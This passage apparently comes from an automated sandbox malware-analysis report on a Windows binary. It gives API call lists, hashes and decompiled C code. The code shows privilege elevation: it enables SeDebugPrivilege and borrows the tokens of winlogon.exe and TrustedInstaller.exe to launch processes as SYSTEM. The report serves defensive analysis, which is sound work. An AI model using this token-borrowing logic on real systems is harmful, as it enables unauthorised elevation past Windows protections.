                                                                                                                                                                                                                          0x0040246a
                                                                                                                                                                                                                          0x00402470
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402470

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402300
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040233E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402356
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402387
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                                                                                                                            • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004023B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004023D9
                                                                                                                                                                                                                          • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040242B
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024BE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024D1
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00402519
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 0040252B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402561
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402574
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025BC
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004025CE
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 004025F0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040260F
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                                                                                                                          • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                                                                                                                          • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                                                                                                                          • API String ID: 2452314994-435178042
                                                                                                                                                                                                                          • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                                                                          • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                                                                                                                                                          0x00408533
                                                                                                                                                                                                                          0x00408533
                                                                                                                                                                                                                          0x00408536
                                                                                                                                                                                                                          0x0040853e
                                                                                                                                                                                                                          0x00408546
                                                                                                                                                                                                                          0x0040854d
                                                                                                                                                                                                                          0x00408559
                                                                                                                                                                                                                          0x00408563
                                                                                                                                                                                                                          0x00408569
                                                                                                                                                                                                                          0x00408572
                                                                                                                                                                                                                          0x00408583
                                                                                                                                                                                                                          0x0040858d
                                                                                                                                                                                                                          0x00408595
                                                                                                                                                                                                                          0x0040859e
                                                                                                                                                                                                                          0x004085a2
                                                                                                                                                                                                                          0x004085a6
                                                                                                                                                                                                                          0x004085aa
                                                                                                                                                                                                                          0x004085ae
                                                                                                                                                                                                                          0x004085b8
                                                                                                                                                                                                                          0x004085c1
                                                                                                                                                                                                                          0x004085c8
                                                                                                                                                                                                                          0x004085cd
                                                                                                                                                                                                                          0x004085cf
                                                                                                                                                                                                                          0x0040867f
                                                                                                                                                                                                                          0x00408688
                                                                                                                                                                                                                          0x0040868d
                                                                                                                                                                                                                          0x0040868f
                                                                                                                                                                                                                          0x00408730
                                                                                                                                                                                                                          0x00408735
                                                                                                                                                                                                                          0x00408737
                                                                                                                                                                                                                          0x0040873d
                                                                                                                                                                                                                          0x00408750
                                                                                                                                                                                                                          0x0040875d
                                                                                                                                                                                                                          0x00408763
                                                                                                                                                                                                                          0x00408770
                                                                                                                                                                                                                          0x00408775
                                                                                                                                                                                                                          0x00408779
                                                                                                                                                                                                                          0x0040878b
                                                                                                                                                                                                                          0x00408790
                                                                                                                                                                                                                          0x004087a2
                                                                                                                                                                                                                          0x004087aa
                                                                                                                                                                                                                          0x004087b8
                                                                                                                                                                                                                          0x004087be
                                                                                                                                                                                                                          0x004087c3
                                                                                                                                                                                                                          0x004087c9
                                                                                                                                                                                                                          0x004087d2
                                                                                                                                                                                                                          0x004087df
                                                                                                                                                                                                                          0x004087e3
                                                                                                                                                                                                                          0x004087e6
                                                                                                                                                                                                                          0x00408801
                                                                                                                                                                                                                          0x004087e8
                                                                                                                                                                                                                          0x004087f8
                                                                                                                                                                                                                          0x004087fe
                                                                                                                                                                                                                          0x00408811
                                                                                                                                                                                                                          0x00408816
                                                                                                                                                                                                                          0x00408816
                                                                                                                                                                                                                          0x0040881c
                                                                                                                                                                                                                          0x00408822
                                                                                                                                                                                                                          0x00408779
                                                                                                                                                                                                                          0x00408824
                                                                                                                                                                                                                          0x00408829
                                                                                                                                                                                                                          0x00408833
                                                                                                                                                                                                                          0x00408834
                                                                                                                                                                                                                          0x00408840
                                                                                                                                                                                                                          0x00408848
                                                                                                                                                                                                                          0x0040884c
                                                                                                                                                                                                                          0x00408850
                                                                                                                                                                                                                          0x00408855
                                                                                                                                                                                                                          0x0040885a
                                                                                                                                                                                                                          0x00408860
                                                                                                                                                                                                                          0x004088ac
                                                                                                                                                                                                                          0x004088b1
                                                                                                                                                                                                                          0x004088b3
                                                                                                                                                                                                                          0x004088bf
                                                                                                                                                                                                                          0x004088c5
                                                                                                                                                                                                                          0x004088cb
                                                                                                                                                                                                                          0x004088da
                                                                                                                                                                                                                          0x004088ea
                                                                                                                                                                                                                          0x004088ed
                                                                                                                                                                                                                          0x004088f8
                                                                                                                                                                                                                          0x004088ff
                                                                                                                                                                                                                          0x00408905
                                                                                                                                                                                                                          0x004088b5
                                                                                                                                                                                                                          0x004088b5
                                                                                                                                                                                                                          0x004088b5
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408862
                                                                                                                                                                                                                          0x00408862
                                                                                                                                                                                                                          0x0040886d
                                                                                                                                                                                                                          0x00408874
                                                                                                                                                                                                                          0x0040887b
                                                                                                                                                                                                                          0x00408882
                                                                                                                                                                                                                          0x00408889
                                                                                                                                                                                                                          0x00408895
                                                                                                                                                                                                                          0x00408897
                                                                                                                                                                                                                          0x00408658
                                                                                                                                                                                                                          0x00408658
                                                                                                                                                                                                                          0x0040865d
                                                                                                                                                                                                                          0x00408661
                                                                                                                                                                                                                          0x0040866a
                                                                                                                                                                                                                          0x00408673
                                                                                                                                                                                                                          0x00408678
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408678
                                                                                                                                                                                                                          0x00408860
                                                                                                                                                                                                                          0x00408695
                                                                                                                                                                                                                          0x00408695
                                                                                                                                                                                                                          0x0040869f
                                                                                                                                                                                                                          0x004086a2
                                                                                                                                                                                                                          0x004086af
                                                                                                                                                                                                                          0x004086a4
                                                                                                                                                                                                                          0x004086a7
                                                                                                                                                                                                                          0x004086a7
                                                                                                                                                                                                                          0x004086b4
                                                                                                                                                                                                                          0x004086bf
                                                                                                                                                                                                                          0x004086cb
                                                                                                                                                                                                                          0x004086d3
                                                                                                                                                                                                                          0x004086d7
                                                                                                                                                                                                                          0x004086db
                                                                                                                                                                                                                          0x004086e0
                                                                                                                                                                                                                          0x004086f1
                                                                                                                                                                                                                          0x004086f8
                                                                                                                                                                                                                          0x004086ff
                                                                                                                                                                                                                          0x00408706
                                                                                                                                                                                                                          0x0040870d
                                                                                                                                                                                                                          0x00408719
                                                                                                                                                                                                                          0x0040871b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040871b
                                                                                                                                                                                                                          0x004085d5
                                                                                                                                                                                                                          0x004085da
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004085ec
                                                                                                                                                                                                                          0x004085ef
                                                                                                                                                                                                                          0x004085f6
                                                                                                                                                                                                                          0x004085fd
                                                                                                                                                                                                                          0x00408604
                                                                                                                                                                                                                          0x0040860b
                                                                                                                                                                                                                          0x00408612
                                                                                                                                                                                                                          0x00408616
                                                                                                                                                                                                                          0x00408620
                                                                                                                                                                                                                          0x0040862a
                                                                                                                                                                                                                          0x00408632
                                                                                                                                                                                                                          0x00408633
                                                                                                                                                                                                                          0x00408638
                                                                                                                                                                                                                          0x0040864a
                                                                                                                                                                                                                          0x0040864f
                                                                                                                                                                                                                          0x00408651
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040854f
                                                                                                                                                                                                                          0x0040854f
                                                                                                                                                                                                                          0x00408550
                                                                                                                                                                                                                          0x00408556
                                                                                                                                                                                                                          0x00408556

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                            • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                            • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                            • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                                                                                                                          • swscanf.MSVCRT ref: 00408620
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00408633
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                                                                                                                          • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                                                                                                                          • API String ID: 3933224404-3784219877
                                                                                                                                                                                                                          • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                                                                                                                          • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                                                                                                                          0x00401fe6
                                                                                                                                                                                                                          0x00401ff1
                                                                                                                                                                                                                          0x00401ff3
                                                                                                                                                                                                                          0x00401fff
                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                          0x004020a8
                                                                                                                                                                                                                          0x004020ab
                                                                                                                                                                                                                          0x004020f3
                                                                                                                                                                                                                          0x004020f6
                                                                                                                                                                                                                          0x00402162
                                                                                                                                                                                                                          0x00402165
                                                                                                                                                                                                                          0x004021f2
                                                                                                                                                                                                                          0x004021f5
                                                                                                                                                                                                                          0x00402235
                                                                                                                                                                                                                          0x00402238
                                                                                                                                                                                                                          0x004022be
                                                                                                                                                                                                                          0x0040223a
                                                                                                                                                                                                                          0x0040223a
                                                                                                                                                                                                                          0x00402240
                                                                                                                                                                                                                          0x0040224b
                                                                                                                                                                                                                          0x0040224e
                                                                                                                                                                                                                          0x00402251
                                                                                                                                                                                                                          0x00402254
                                                                                                                                                                                                                          0x00402259
                                                                                                                                                                                                                          0x0040225e
                                                                                                                                                                                                                          0x00402262
                                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                                          0x00402262
                                                                                                                                                                                                                          0x00402266
                                                                                                                                                                                                                          0x0040226c
                                                                                                                                                                                                                          0x00402271
                                                                                                                                                                                                                          0x00402274
                                                                                                                                                                                                                          0x00402276
                                                                                                                                                                                                                          0x0040229a
                                                                                                                                                                                                                          0x0040229a
                                                                                                                                                                                                                          0x00402278
                                                                                                                                                                                                                          0x00402296
                                                                                                                                                                                                                          0x00402296
                                                                                                                                                                                                                          0x0040229c
                                                                                                                                                                                                                          0x0040229c
                                                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                                                          0x004022c2
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                                                          0x00402201
                                                                                                                                                                                                                          0x00402203
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402220
                                                                                                                                                                                                                          0x00402225
                                                                                                                                                                                                                          0x00402227
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00402173
                                                                                                                                                                                                                          0x00402179
                                                                                                                                                                                                                          0x0040217b
                                                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                                                          0x00402183
                                                                                                                                                                                                                          0x00402185
                                                                                                                                                                                                                          0x00402188
                                                                                                                                                                                                                          0x0040218d
                                                                                                                                                                                                                          0x0040218f
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004021a2
                                                                                                                                                                                                                          0x004021a7
                                                                                                                                                                                                                          0x004021a9
                                                                                                                                                                                                                          0x004021ac
                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                                                          0x004021d3
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004020fe
                                                                                                                                                                                                                          0x00402103
                                                                                                                                                                                                                          0x00402105
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402111
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x004020ad
                                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                                          0x004020b9
                                                                                                                                                                                                                          0x004020bc
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020c2
                                                                                                                                                                                                                          0x004020c4
                                                                                                                                                                                                                          0x004020ce
                                                                                                                                                                                                                          0x004020d0
                                                                                                                                                                                                                          0x004020d3
                                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                                          0x004020d5
                                                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                                                          0x004020e7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020dd
                                                                                                                                                                                                                          0x004020de
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020ec
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00000000
